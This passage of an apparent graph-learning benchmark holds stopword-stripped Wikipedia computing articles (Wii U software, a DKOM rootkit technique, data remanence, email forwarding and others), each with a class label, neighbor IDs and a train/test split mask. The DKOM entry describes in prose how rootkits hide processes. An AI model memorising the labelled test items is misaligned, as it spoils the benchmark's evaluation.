    "text": "Wii_U_system_software:wii u system software wii u system software official firmware version operating system nintendo wii u home video game console nintendo maintains wii u systemwide features applications offering system software updates via internet updates optional console owner may required order retain interoperability nintendo online services update cumulative including changes previous updates system official integrated development environment named multi published embedded software engineering vendor green hills software intended use nintendo licensed developers programming wii u details operating system internal architecture officially publicized wii u menu main dashboard system acting application organizer launcher graphical shell similar wii wii menu nintendo 3ds home menu allows launching software stored wii u optical discs applications installed internal memory external storage device wii titles system wii mode warawara plaza displayed tv screen wii u gamepad screen displays application icons available launch two screens display roles swapped press button like original wii discs also hot-swapped menu wii u menu may also used launch applications entirely beyond gaming miiverse social network integrated games applications internet browser world wide web play media netflix amazon video hulu youtube download wii u software content nintendo eshop receive official notifications nintendo system settings parental controls activity log also launched menu wii u menu directly integrated miiverse nintendo network wii u powers television screen shows warawara plaza user status comments miiverse shown user represented respective mii associated miiverse community users could save mii warawara plaza personal library like posts yeah write comment send friend request since miiverse discontinued warawara plaza shows built-in tips nintendo home menu stylized home menu accessed game application user pressing home button wii u gamepad wii u pro controller wii remote home menu allows user launch certain multitasking applications miiverse nintendo tvii nintendo eshop internet browser game application running also displays various information date time wireless signal status controller battery life controller settings current downloads also managed download manager downloads installs games applications respective updates well downloading system updates background nintendo eshop nintendo online digital distribution service serving wii u nintendo switch nintendo 3ds handheld console eshop provides downloadable wii u software titles retail download wii games virtual console games trial versions demos various applications also allows users purchase downloadable content dlc automatically download patches physical downloadable games content obtained nintendo eshop attached nintendo network id used one system wii u allows background downloading via spotpass either playing game application sleep mode ten downloads queued time status checked download manager application pop-up notification appear home menu section notify user download finished unlike past nintendo digital stores wii shop channel nintendo dsi shop used nintendo points currency nintendo eshop uses user local currency using digital wallet system whereby funds added debited wallet user add funds wallet number ways either credit debit card purchasing nintendo eshop cards also possible purchase download codes select retailers later redeem eshop july 22 2014 japanese nintendo eshop updated support digital money cards add funds user account digital wallet via near field communication nfc wii u gamepad cards embedded ic chips typically used buy train bus tickets well make purchases convenience stores nintendo eshop supports user software reviews users submit review stars ranging one five representing quality crescent order also possible categorize software whether suitable hardcore casual players reviews submitted software review used least one hour miiverse portmanteau mii universe integrated social networking service allowed players interact share experiences mii characters miiverse allowed users seamlessly share accomplishments comments hand written game screenshots notes users select games integrated miiverse social interactions could also occur within game miiverse moderated software filtering well human resource team order ensure content shared users appropriate spoilers shared order facilitate stated comments posted could take 30 minutes appear miiverse april 25 2013 miiverse also became available web browsers internet-enabled smartphone tablet pc devices later became available nintendo 3ds december 2013 discontinued november 8 2017 internet browser allows users browse web wii u gamepad and/or television screen functions multitasking application wii u used another game application suspended background browser primarily controlled using wii u gamepad touchscreen analog stick scroll web pages d-pad cycle links page similar using keyboard play html 5 video audio websites youtube various social media user choose hide browser view tv screen privacy contains presentation effects opening stage curtains user also choose google yahoo search engines text wrap option automatically wrap text width screen different zoom levels users also create bookmarks user set personal bookmarks browser supports six tabs simultaneously 32 pages stored browser history older items start replaced nintendo tvii free television-based service allowed users find programs netflix hulu plus amazon video cable network nintendo tvii also allowed users control tivo dvr wii u users able select source program wanted watch watch television wii u gamepad default gamepad screen showed information show currently watched information included reviews screenshots cast lists trailers general information show provided english wikipedia imdb rotten tomatoes well individual source services nintendo tvii also dedicated sports section user could view player positions highlights match updated real-time user personalized settings nintendo tvii favorite shows sports teams personal mii social network account integration users could interact friends community sharing commenting reactions live moments current show social networks miiverse facebook twitter gamepad show played television screen nintendo tvii made available wii u release japan december 8 2012 released north america december 20 2012 scheduled released europe sometime 2013 never fulfilled nintendo uk later issued apology stated expect announcements near future however february 14 2015 nintendo europe officially confirmed cancelled plans service release european countries due extremely complex nature localising multiple television services across diverse range countries varied licensing systems nintendo worked youtube lovefilm nico nico douga ynn bring streaming movie television content wii u. nintendo initially delayed deployment media capabilities wii u delayed online infrastructure late launch day firmware update deployed netflix app access hulu plus amazon video youtube apps gradually became active later launch week december 25 2014 without prior notice crunchyroll launched eponymous app north american wii u eshop later released pal systems january 8 2015 initially despite free download content crunchyroll app accessible premium account users since fixed allow access crunchyroll members long delay without prior notice may 28 2015 users access nintendo eshop united kingdom download bbc iplayer app december 17 2015 also without prior notice music streaming app napster released wii u eligible european countries app later released united states march 11 2016 rhapsody name wii u chat nintendo online video chat solution powered nintendo network service allows users use wii u gamepad front-facing camera video chat registered friends video chatting wii u gamepad essentially needed since application compatible off-tv play users could draw pictures gamepad top video chat display game another application already running gamepad home button ring flash indicating incoming call wii street u built-in map application developed nintendo google wii u nintendo direct satoru iwata revealed google maps integrated panorama feature wii u player could choose place around globe look use street view feature use wii u gamepad application available wii u eshop free download october 31 2013 became paid app nintendo discontinued app march 31 2016 wii karaoke u built-in karaoke app developed nintendo joysound wii u licenses joysound online song library japanese karaoke service provider xing game use wii u gamepad microphone universal usb microphone connected wii u console game requires internet connection players access new songs download buying tickets songs nintendo eshop players rent songs want sing limited period 24 hours 90 days joysounds song library choosing stage perform players able select mii characters represent players also able adjust options echo key speed song players use wii remotes accompany singer playing instruments cymbals maracas game includes lesson mode trains quizzes players tone rhythm released free app titled wii karaoke u joysound nintendo eshop europe october 4 2013 wii u wii mode fully virtualized wii system limitations privileges thereof wii game disc inserted wii u appropriate launchable icon appears wii u menu alternatively wii u may powered holding b button either method effectively relaunch wii u entirely become virtual wii system relaunched wii u mode native wii system wii mode internal storage memory limited 512 mb sd card menu utilize card 32 gb size slight differences wii u wii mode native wii system data management settings accessible wii system settings wii shop channel fully available purchase wii software however netflix hulu plus youtube applications used system must relaunched wii u mode order utilize native versions applications addition running one primary game application wii u capable simultaneously opening select system applications primary application launched wii u menu user push home button temporarily suspend application one following applications may launched may possibly interoperate primary application screenshots game scores wii u launched system software either version 1.0.1 1.0.2 update released day added web browser miiverse method transferring data wii sandboxed way owners play wii games gamecube games although play gamecube games using homebrew april 25 2013 major new update version 3.0 improved system loading times added automatic installation downloaded software version 4.0 released september 30 2013 added features ability plug headset directly gamepad wii u chat ability take screenshots upload web browser gameplay supports usb keyboards surround sound wii games june 2 2014 another major update version number 5.0 released added abilities display quick start menu wii u gamepad alerts addition changes version immediately followed 5.1.0 added support wii u wii u system transfer gaming platforms nintendo gaming platforms generation gaming platforms seventh generation",
    "neighbors": [
      10761,
      4364,
      1148,
      7325,
      1067,
      684,
      4908,
      7983,
      1083,
      2761,
      9033,
      6486,
      9691,
      1501,
      7519,
      607,
      4972,
      8316,
      119,
      1916,
      8829
    ],
    "mask": "None"
  },
  {
    "node_id": 6487,
    "label": 2,
    "text": "LINX_(IPC):linx ipc linx new generation ose link handler inter-process communications ipc provides high performance robust functionality developed enea ab sweden linx released free open-source software subject requirements gnu general public license gpl version 2 linx ported later linux works success ose linux kernels possible interconnect linux machine ose one direct communication path processes run different kernels utilizing direct message passing linx scales dsps microcontrollers 64-bit cpus linx independent underlying processor operating system interconnect supports control data plane applications reliable unreliable media linx also supports distributed system topology single processor single blade large networks complex cluster topologies deployed hundreds processors multi-rack system linx enable application processes distributed across multiple operating systems cpus interconnects communicate running cpu operating system linx provides services application regardless hardware operating system physical interconnect network topology linx utilizes innovative address map connections greatly enhances flexibility scalability unlike ipc models must maintain entire system address map every node system linx nodes store addresses needed active connections",
    "neighbors": [
      2432,
      5029,
      6694,
      4589,
      2222,
      7983,
      1586,
      8499,
      2804,
      10486,
      6555,
      5471
    ],
    "mask": "None"
  },
  {
    "node_id": 6488,
    "label": 4,
    "text": "Direct_kernel_object_manipulation:direct kernel object manipulation direct kernel object manipulation dkom common rootkit technique microsoft windows hide potentially damaging third-party processes drivers files intermediate connections task manager event scheduler core rootkit employs dkom hides object manager task manager modifying linked list containing list active threads processes type rootkit essentially hide traces object manager wrapping pointer away rootkit possible due fact kernel modules loadable drivers direct access kernel memory privileged access system kernel pings find list processes running system relies eprocess find however windows kernel thread based process based pointers freely modified without unintended effects modifying linked list pointers wrap around rootkit process rootkit becomes invisible windows event viewer system integrity applications rely list allows dkom rootkits free rein targeted system dkom uses process represented object interconnected one another operating system within process pre-allocated set space contains address current next mutex_locked thread vital information listed eprocess memory section object manager contains double linked list known processes running also known eprocess however dkom take advantage structure modifying front link flink point previous node processor want hide pointing back link blink hidden processor previous structure modifying subsection eprocess block list currently active processes points around hidden process essentially hides paper trail given process injector scrutiny scheduler process hidden yet runs indefinitely thread active due round-robin policy main issue type rootkit hidden processes still able run despite various context switches windows scheduler threads segregated perform tasks processes rather thread calls multiple processes given time frame process controlled round-robin nature scheduler threads put idle allow threads active even though process becomes invisible task manager process still runs concurrently system threads active makes detecting hidden processes created rootkit extremely difficult detecting rootkits separated many complex layers include integrity checking behavioral detection checking cpu usage ongoing outgoing network traffic signatures drivers simple anti-virus tools detect common rootkits however case kernel type rootkit types rootkits hide system table event viewer detecting requires looking hooked functions difficult implement also requires iterating every node eprocess however even though presence malicious processes physically present handler calls made background processes point threads network connections points processes drivers point threads dkom rootkit viable hide presence every single reference eprocess means rootkit routinely update linkers point away iterating every entity scheduler threads object headers etc detecting dkom rootkit possible certain memory patterns behaviors may appear scheduler one found actual rootkit eventually found well",
    "neighbors": [
      11584,
      9791,
      6797,
      4423
    ],
    "mask": "Test"
  },
  {
    "node_id": 6489,
    "label": 2,
    "text": "Dave_Sifry:dave sifry dave sifry american software entrepreneur blogosphere icon known founding technorati 2004 formerly leading blog search engine also lectures widely wireless technology policy weblogs open source software sifry grew long island learned program commodore pet teens decided someday would move silicon valley start company studying computer science johns hopkins university worked mitsubishi sifry cofounded sputnik wi-fi gateway company linuxcare offbeat guides founding member board linux international technical advisor national cybercrime training partnership law enforcement dave worked business developer mozilla/mozillamessaging trying bring partners mozilla thunderbird david married noriko two kids melody noah",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      11418,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      8354,
      3369,
      5931,
      8364,
      1717,
      823,
      2109,
      11069,
      10687,
      10822,
      8263,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      3802,
      4831,
      9696,
      11232,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "None"
  },
  {
    "node_id": 6490,
    "label": 4,
    "text": "UT-VPN:ut-vpn university tsukuba virtual private network ut-vpn free open source software application implements virtual private network vpn techniques creating secure point-to-point site-to-site connections routed bridged configurations remote access facilities uses ssl/tls security encryption capable traversing network address translators nats firewalls written daiyuu nobori softether corporation published gnu general public license gpl university tsukuba ut-vpn compatible packetix vpn product softether corporation ut-vpn developed based packetix vpn functions deleted example radius client supported packetix vpn server supported ut-vpn server ut-vpn uses openssl library provide encryption packets ut-vpn offers username/password-based authentication ut-vpn software consist ut-vpn server ut-vpn client ut-vpn functions l2-vpn ssl/tls 'virtual nic virtual network interface card installed os ut-vpn client installed virtual nic recognized physical nic os ut-vpn encapsulation tcp ssl/tls packets l2 frames virtual nic ut-vpn client connects ut-vpn server authorization ut-vpn server succeeded ut-vpn client establishes connection virtual hub ut-vpn server 'virtual hub function virtual l2 switch virtual hub handle frames received ut-vpn client necessary ut-vpn server forwards encapuslated l2 frames ut-vpn client virtual hub ut-vpn server function cascading connection virtual hub ut-vpn server site-to-site connection come true cascading connection ut-vpn server bridging function arbitrary nic os virtual hub ut-vpn server virtual l3 switch function virtual l3 switch l3-switching virtual hub ut-vpn server primary method community support softether mailing lists",
    "neighbors": [
      6797,
      9722,
      8211,
      11162,
      3742,
      9764,
      8998,
      4268,
      3629,
      7983,
      10417,
      7859,
      2228,
      3777,
      2884,
      8265,
      11468,
      7376,
      2136,
      6364,
      5084,
      10210,
      9318,
      8039,
      5612,
      11248,
      5749,
      3322
    ],
    "mask": "None"
  },
  {
    "node_id": 6491,
    "label": 2,
    "text": "DesktopBSD:desktopbsd desktopbsd unix-derivative desktop-oriented operating system based freebsd goal combine stability freebsd ease-of-use k desktop environment 3 default graphical user interface desktopbsd essentially customized installation freebsd fork freebsd desktopbsd always based freebsd latest stable branch incorporates certain customized pre-installed software kde desktopbsd utilities configuration files common misconception desktopbsd intended rival trueos bsd-based desktop distribution since similar structure goals however desktopbsd project started approximately one year pc-bsd project despite fact first pc-bsd release came desktopbsd neither desktopbsd pc-bsd projects intend rival completely independent projects distinctive features intended outcomes example desktopbsd uses ports packages additional software installation whereas pc-bsd introduced pbis current release 1.7 made available september 7 2009 release announcement stated last final release desktopbsd project lead developer could longer contribute time required maintain may 2010 development desktopbsd restarted new leadership development announcements stopped soon afterwards leading speculation project dropped however 10 march 2013 forum post appeared announcing project process revived roadmap desktopbsd 2.0 announced september 2015 desktopbsd site along posted screenshots gnome3-based desktop 1.7 release includes 7 september 2009 desktopbsd 1.7 made available project site",
    "neighbors": [
      7552,
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      5397,
      8725,
      9625,
      1946,
      4636,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11698,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      7483,
      3006,
      11459,
      9927,
      8266,
      5067,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      9306,
      607,
      3551,
      7521,
      1891,
      6371,
      998,
      4073,
      9452,
      8816,
      2545,
      3058,
      5363,
      5492,
      2421,
      7027,
      9201,
      2424,
      1273,
      9844,
      11506,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6492,
    "label": 4,
    "text": "Sender_Rewriting_Scheme:sender rewriting scheme mail transfer agent mta sender rewriting scheme srs scheme rewriting envelope sender address email message view remailing context remailing kind email forwarding srs devised order forward email without breaking sender policy framework spf 2003 number cases including change email address mailing lists mta accepts email message destined local mailbox needs forwarded cases question arises deserves receive related bounce message general either author person entity administers forwarding sending bounces author administratively simpler used accomplished keeping original envelope sender however author address subject strict spf policy target mta happens enforce forwarding transaction rejected workaround possible synthesize fly temporary bounce address direct bounce back current mta scheme provides recovering original envelope address bounce arrive forwarded along reverse path—with empty envelope sender time workarounds srs fairly general one notion reversing path resembles original routing dispositions email see srs form variable envelope return path verp inasmuch encodes original envelope sender local part rewritten address consider forwarding message originally destined new address example adapted shevek respect verp local part moved domain name adding prefix hash timestamp reflects operational difference eventual bounces back verp address handled within rewriting domain forged messages unsubscribe users kind abuse n't seen significant exploits last decades instead srs aims remailing possible bounce back alice forged bounces become alluring technique injecting spam apparently originating rewriting sender srs provides another prefix used rewriting already rewritten address multi-hop scenario forward message turn spare adding another timestamp repeating original local part new forwarder adds hash domain name preceding forwarder using database definitely control growth rewritten addresses since sufficient put unique key rewritten local part also allows certain amount anonymity resending process desired however database requires centralization single point failure another possibility store long rewritten address somewhere message header var|i tag dkim-signature may good place choice considerably improves security technique observed unless backup mechanism work bounce message standard format historically mail transfer agents mtas added host name reverse path simple mail transfer protocol smtp reverse path also known paths also used outside smtp e.g bang paths uucp usenet netnews news articles still contain header example information rfc 5321 e-mail envelope smtp info like would 1st step reflects sender 2nd step next mta etc example let assume 2nd mta forwards mail 3rd mta finally delivered final mta also known mail delivery agent mda putting mail mailbox recipient mda transforms reverse path known header field smtp uses mx records forward routing explicit source routes ... ... route mail via mta mda cumbersome make things worse sometimes new 1982 style addresses mixed old uucp bang paths constructs like ... ... various kludges smtp mx records made essentially useless therefore source routing deprecated 1989 rfc 1123 one special case rfc 1123 gateways networks like uucp netnews first sending mta reach final receiver directly tcp solved mx records necessary rewriting foreign addresses gateway mx acronym mail exchanger another special case mailing lists list server rewrites reverse paths error handling address bounces error messages recipients list server could automatically unsubscribe bouncing recipients type address rewriting known since rfc 821 still used today rfc 5321 well rfc 2821 updated smtp chapter rfc 1123 last least forwarding another address always worked rewriting address forward path also known forwarding mta accepted responsibility forwarding mail returning potential bounce messages sender rfc 821 later smtp specifications offer two result codes situation privacy reasons result codes today rarely used include meaning effect forwarding third parties identical respectively noted rfc 1123 deprecated source routing implicitly also deprecated reverse routing bounces relatively small internet back 1989 mail admins postmasters often knew fixed problems fly routing bounce messages back via forwarders waste time bandwidth mta noting problem e.g rejection 5xx error code could send error message directly back mx sender since rfc 1123 forwarders third parties still rewrote address kept side effect mtas wishing accept mail forwarders generally accept address decade later spammers started abuse flaw post-1123 smtp today mails spam reverse paths forged note spammers typically forge working reverse paths many mtas reject mail callback verification plausibility checks fail reverse path rfc 5321 well rfc 2821 states non-delivery reports bounces must sent originator indicated reverse path mta accepted responsibility delivery however bounce message may suppressed original content hostile cf spam virus mail message forged rfc 5321 section 6 note current forgery detection methods require mailbox owner supply information work failing supply criteria make bounce message classifiable backscatter although people mistakenly think open relays forwarders unlucky position regards issue generally ca n't guarantee address indicates originator also ca n't guarantee final delivery succeed smtp problem caused side effect rfc 1123 addressed spf executive summary spf breaks forwarding actually case asks receivers check spf border mta later receivers arrange forwarding way works spf essence three strategies sender rewriting scheme srs one way third strategy",
    "neighbors": [
      3549,
      8260,
      10924,
      8337,
      7764,
      6261,
      3350,
      9909,
      10906,
      3645
    ],
    "mask": "None"
  },
  {
    "node_id": 6493,
    "label": 8,
    "text": "CL-HTTP:cl-http cl-http web server client proxy written common lisp based web application framework written john c. mallery 10 days starting 1994 symbolics lisp machine year port macintosh common lisp done 1996 cl-http became first web server support http 1.1 protocol runs unix linux bsd variants mac os x solaris symbolics genera microsoft windows cl-http makes extensive use common lisp object system macro capabilities lisp cl-http used several applications elm-art tutoring system written common lisp using cl-http later commercialized netcoach interbook early adaptive electronic textbook also written top cl-http cl-http used early tool create web interfaces applications 1994 cl-http used w3c members ietf http working group develop reference clients servers http 1.1 prominently cl-http used presidency bill clinton web server white house publications web site distributed daily press releases official publications clinton administration cl-http used example non-trivial lisp application",
    "neighbors": [
      1920,
      4865,
      2438,
      3462,
      8582,
      9865,
      6797,
      2062,
      9614,
      2576,
      148,
      1812,
      9877,
      4122,
      6941,
      9245,
      10526,
      8739,
      3876,
      1448,
      4777,
      9128,
      4779,
      5165,
      7983,
      4529,
      7987,
      692,
      8883,
      823,
      5048,
      6201,
      6074,
      6969,
      7867,
      4797,
      190,
      8258,
      8771,
      8644,
      9666,
      4550,
      1353,
      11083,
      8908,
      1613,
      595,
      84,
      1365,
      9299,
      2392,
      4056,
      7896,
      225,
      7267,
      102,
      3176,
      8554,
      2667,
      5612,
      8691,
      5492,
      4725,
      10104,
      3705,
      11259,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 6494,
    "label": 4,
    "text": "Data_remanence:data remanence data remanence residual representation digital data remains even attempts made remove erase data residue may result data left intact nominal file deletion operation reformatting storage media remove data previously written media physical properties storage media allow previously written data recovered data remanence may make inadvertent disclosure sensitive information possible storage media released uncontrolled environment e.g thrown trash lost various techniques developed counter data remanence techniques classified clearing purging/sanitizing destruction specific methods include overwriting degaussing encryption media destruction effective application countermeasures complicated several factors including media inaccessible media effectively erased advanced storage systems maintain histories data throughout data life cycle persistence data memory typically considered volatile several standards exist secure removal data elimination data remanence many operating systems file managers software provide facility file immediately deleted user requests action instead file moved holding area making easy user undo mistake similarly many software products automatically create backup copies files edited allow user restore original version recover possible crash autosave feature even explicit deleted file retention facility provided user use operating systems actually remove contents file deleted unless aware explicit erasure commands required like solid-state drive cases operating system issue serial ata trim command scsi unmap command let drive know longer maintain deleted data instead simply remove file entry file system directory requires less work therefore faster contents file—the actual data—remain storage medium data remain operating system reuses space new data systems enough filesystem metadata also left behind enable easy undeletion commonly available utility software even undelete become impossible data overwritten read software reads disk sectors directly computer forensics often employs software likewise reformatting repartitioning reimaging system unlikely write every area disk though cause disk appear empty case reimaging empty except files present image software finally even storage media overwritten physical properties media may permit recovery previous contents cases however recovery possible reading storage device usual way requires using laboratory techniques disassembling device directly accessing/reading components section complications gives explanations causes data remanence three levels commonly recognized eliminating remnant data clearing removal sensitive data storage devices way assurance data may reconstructed using normal system functions software file/data recovery utilities data may still recoverable without special laboratory techniques clearing typically administrative protection accidental disclosure within organization example hard drive re-used within organization contents may cleared prevent accidental disclosure next user purging sanitizing removal sensitive data system storage device intent data reconstructed known technique purging proportional sensitivity data generally done releasing media beyond control discarding old media moving media computer different security requirements storage media made unusable conventional equipment effectiveness destroying media varies medium method depending recording density media and/or destruction technique may leave data recoverable laboratory methods conversely destruction using appropriate techniques secure method preventing retrieval common method used counter data remanence overwrite storage media new data often called wiping shredding file disk analogy common methods destroying print media although mechanism bears similarity method often implemented software alone may able selectively target part media popular low-cost option applications overwriting generally acceptable method clearing long media writable damaged simplest overwrite technique writes data everywhere—often pattern zeros minimum prevent data retrieved simply reading media using standard system functions attempt counter advanced data recovery techniques specific overwrite patterns multiple passes often prescribed may generic patterns intended eradicate trace signatures example seven-pass pattern 0xf6 0x00 0xff random 0x00 0xff random sometimes erroneously attributed us standard dod 5220.22-m. one challenge overwrite areas disk may inaccessible due media degradation errors software overwrite may also problematic high-security environments require stronger controls data commingling provided software use use advanced storage technologies may also make file-based overwrite ineffective see discussion complications specialized machines software capable overwriting software sometimes standalone operating system specifically designed data destruction also machines specifically designed wipe hard drives department defense specifications dod 5220.22-m. peter gutmann investigated data recovery nominally overwritten media mid-1990s suggested magnetic force microscopy may able recover data developed specific patterns specific drive technologies designed counter patterns come known gutmann method daniel feenberg economist private national bureau economic research claims chances overwritten data recovered modern hard drive amount urban legend also points -minute gap rose mary woods created tape richard nixon discussing watergate break-in erased information gap recovered feenberg claims would easy task compared recovery modern high density digital signal november 2007 united states department defense considers overwriting acceptable clearing magnetic media within security area/zone sanitization method degaussing physical destruction acceptable latter hand according 2014 nist special publication 800-88 rev 1 p. 7 storage devices containing magnetic media single overwrite pass fixed pattern binary zeros typically hinders recovery data even state art laboratory techniques applied attempt retrieve data analysis wright et al recovery techniques including magnetic force microscopy also concludes single wipe required modern drives point long time required multiple wipes created situation many organisations ignore issue together – resulting data leaks loss degaussing removal reduction magnetic field disk drive using device called degausser designed media erased applied magnetic media degaussing may purge entire media element quickly effectively degaussing often renders hard disks inoperable erases low-level formatting done factory manufacturing cases possible return drive functional state serviced manufacturer however modern degaussers use strong magnetic pulse motor spins platters may destroyed degaussing process servicing may cost-effective degaussed computer tape dlt generally reformatted reused standard consumer hardware high-security environments one may required use degausser approved task example us government military jurisdictions one may required use degausser nsa evaluated products list encrypting data stored media may mitigate concerns data remanence decryption key strong carefully controlled may effectively make data media unrecoverable even key stored media may prove easier quicker overwrite key vs entire disk process called crypto-shredding encryption may done file-by-file basis whole disk cold boot attacks one possible methods subverting full-disk encryption method possibility storing plain text key unencrypted section medium see section complications data ram discussion side-channel attacks keyloggers acquisition written note containing decryption key rubber-hose cryptanalysis may offer greater chance success rely weaknesses cryptographic method employed relevance article minor thorough destruction underlying storage media certain way counter data remanence however process generally time-consuming cumbersome may require extremely thorough methods even small fragment media may contain large amounts data specific destruction techniques include storage media may areas become inaccessible normal means example magnetic disks may develop new bad sectors data written tapes require inter-record gaps modern hard disks often feature reallocation marginal sectors tracks automated way operating system would need work problem especially significant solid state drives ssds rely relatively large relocated bad block tables attempts counter data remanence overwriting may successful situations data remnants may persist nominally inaccessible areas data storage systems sophisticated features may make overwrite ineffective especially per-file basis example journaling file systems increase integrity data recording write operations multiple locations applying transaction-like semantics systems data remnants may exist locations outside nominal file storage location file systems also implement copy-on-write built-in revision control intent writing file never overwrites data in-place furthermore technologies raid anti-fragmentation techniques may result file data written multiple locations either design fault tolerance data remnants wear leveling also defeat data erasure relocating blocks time originally written time overwritten reason security protocols tailored operating systems software featuring automatic wear leveling recommend conducting free-space wipe given drive copying many small easily identifiable junk files files containing nonsensitive data fill much drive possible leaving amount free space necessary satisfactory operation system hardware software storage and/or system demands grow junk data files deleted necessary free space even deletion junk data files secure initial nonsensitivity reduces near zero consequences recovery data remanent optical media magnetic erased conventional degaussing write-once optical media cd-r dvd-r etc also purged overwriting rewritable optical media cd-rw dvd-rw may receptive overwriting methods successfully sanitizing optical discs include delaminating abrading metallic data layer shredding incinerating destructive electrical arcing exposure microwave energy submersion polycarbonate solvent e.g. acetone research center magnetic recording research university california san diego uncovered problems inherent erasing data stored solid-state drives ssds researchers discovered three problems file storage ssds solid-state drives flash-based differ hard-disk drives two ways first way data stored second way algorithms used manage access data differences exploited recover previously erased data ssds maintain layer indirection logical addresses used computer systems access data internal addresses identify physical storage layer indirection hides idiosyncratic media interfaces enhances ssd performance reliability lifespan see wear leveling also produce copies data invisible user sophisticated attacker could recover sanitizing entire disks sanitize commands built ssd hardware found effective implemented correctly software-only techniques sanitizing entire disks found work time testing none software techniques effective sanitizing individual files included well-known algorithms gutmann method us dod 5220.22-m rcmp tssit ops-ii schneier 7 pass mac os x secure erase trash trim feature many ssd devices properly implemented eventually erase data deleted process take time typically several minutes many older operating systems support feature combinations drives operating systems work data remanence observed static random-access memory sram typically considered volatile i.e contents degrade loss external power one study data retention observed even room temperature data remanence also observed dynamic random-access memory dram modern dram chips built-in self-refresh module require power supply retain data must also periodically refreshed prevent data contents fading away capacitors integrated circuits study found data remanence dram data retention seconds minutes room temperature full week without refresh cooled liquid nitrogen study authors able use cold boot attack recover cryptographic keys several popular full disk encryption systems including microsoft bitlocker apple filevault dm-crypt linux truecrypt despite memory degradation authors described study able take advantage redundancy way keys stored expanded efficient use key scheduling authors recommend computers powered rather left sleep state physical control owner cases certain modes software program bitlocker authors recommend boot password key removable usb device used tresor kernel patch linux specifically intended prevent cold boot attacks ram ensuring encryption keys neither user accessible stored ram",
    "neighbors": [
      2432,
      3841,
      5120,
      3972,
      5256,
      5142,
      5658,
      7579,
      9499,
      5661,
      9762,
      4389,
      6309,
      8997,
      9129,
      3629,
      7983,
      11695,
      7090,
      7229,
      2110,
      831,
      1475,
      6340,
      7369,
      4303,
      7887,
      10195,
      2779,
      2534,
      8678,
      9319,
      11368,
      3314,
      3315,
      3572,
      7794,
      11251,
      9335,
      9086,
      2687
    ],
    "mask": "Test"
  },
  {
    "node_id": 6495,
    "label": 3,
    "text": "Apple-designed_processors:apple-designed processors apple inc. developed range system chip soc well system package sip processors powering mobile consumer devices tasks meet stringent power space constraints common mobile devices chips combine central processing unit cpu components single compact physical package johny srouji executive charge apple silicon design prior introduction apple series socs apple used several socs early revisions iphone ipod touch specified apple manufactured samsung integrate single arm-based processing core cpu graphics processing unit gpu electronics necessary provide mobile computing functions within single physical package apl0098 also 8900b s5l8900 package package pop system chip soc introduced june 29 2007 launch original iphone includes 412 mhz single-core arm11 cpu powervr mbx lite gpu manufactured samsung 90 nm process first generation ipod touch also used apl0278 also s5l8720 package package pop system chip soc introduced september 9 2008 launch second generation ipod touch includes 533 mhz single-core arm11 cpu powervr mbx lite gpu manufactured samsung 65 nm process apl0298 also s5l8920 package package pop system chip soc introduced june 8 2009 launch iphone 3gs includes 600 mhz single-core cortex-a8 cpu powervr sgx535 gpu manufactured samsung 65 nm process apl2298 also s5l8922 45 nm die shrunk version iphone 3gs soc introduced september 9 2009 launch third generation ipod touch family systems chip soc used multiple devices including apple portable devices certain models iphone ipad ipod touch apple tv digital media player integrate one arm-based processing cores cpu graphics processing unit gpu cache memory electronics necessary provide mobile computing functions within single physical package designed apple manufactured samsung tsmc apple a4 package package pop system chip soc designed apple inc. manufactured samsung combines arm cortex-a8 cpu powervr gpu emphasizes power efficiency chip commercially debuted release apple ipad tablet followed shortly iphone 4 smartphone 4th generation ipod touch 2nd generation apple tv superseded ipad 2 released following year apple a5 processor apple a4 based arm processor architecture first version released ran 1 ghz ipad contains arm cortex-a8 cpu core paired powervr sgx 535 graphics processor gpu built samsung 45-nanometer nm silicon chip fabrication process clock speed units used iphone 4 ipod touch 4th generation 800 mhz clock speed unit used apple tv revealed cortex-a8 core used a4 thought use performance enhancements developed chip designer intrinsity subsequently acquired apple collaboration samsung resulting core dubbed hummingbird able run far higher clock rates implementations remaining fully compatible cortex-a8 design provided arm performance improvements include additional l2 cache cortex-a8 cpu core used a4 also used samsung s5pc110a01 soc sgx535 a4 could theoretically push 35 million polygons per second 500 million pixels per second although real world performance may considerably less a4 processor package contain ram supports pop installation hence package two low-power 128 mb ddr sdram chips totaling 256 mb mounted top a4 used first-generation ipad fourth-generation ipod touch second-generation apple tv iphone 4 two 256 mb packages total 512 mb ram connected processor using arm 64-bit-wide amba 3 axi bus support ipad demand high graphics bandwidth width ram data bus double used previous arm11 arm9 based apple devices apple a5 system chip soc designed apple inc. manufactured samsung replaced a4 chip commercially debuted release apple ipad 2 tablet march 2011 followed release iphone 4s smartphone later year apple claims compared predecessor a4 a5 cpu twice work gpu nine times graphics performance a5 contains dual-core arm cortex-a9 cpu arm advanced simd extension marketed neon dual core powervr sgx543mp2 gpu gpu push 70 80 million polygons/second pixel fill rate 2 billion pixels/second apple lists a5 clocked 1 ghz ipad 2 technical specifications page though dynamically adjust frequency save battery life clock speed unit used iphone 4s 800 mhz like a4 a5 process size 45 nm updated 32 nm version a5 processor used third generation apple tv ipod touch 5th generation ipad mini new version ipad 2 version ipad2,4 chip apple tv one core locked markings square package indicates named apl2498 software chip called s5l8942 32 nm variant a5 provides around 15 better battery life web browsing 30 better playing 3d games approximately 20 better battery life video playback march 2013 apple released updated version third generation apple tv appletv3,2 containing smaller single-core version a5 processor unlike a5 variants version a5 package-on-package pop stacked ram chip small 6.1×6.2 mm decrease size due decrease feature size still 32 nm fabrication process indicates a5 revision new design markings tell named apl7498 software chip called s5l8947 apple a5x system-on-a-chip soc designed apple inc. announced march 7 2012 launch third generation ipad high performance variant apple a5 apple claims twice graphics performance a5 superseded fourth generation ipad apple a6x processor soc quad-core graphics unit powervr sgx543mp4 instead previous dual-core well quad-channel memory controller provides memory bandwidth 12.8 gb/s roughly three times a5 added graphics cores extra memory channels add large die size 165 mm² example twice size nvidia tegra 3 mainly due large powervr sgx543mp4 gpu clock frequency dual arm cortex-a9 cores shown operate 1 ghz frequency a5 ram a5x separate main cpu 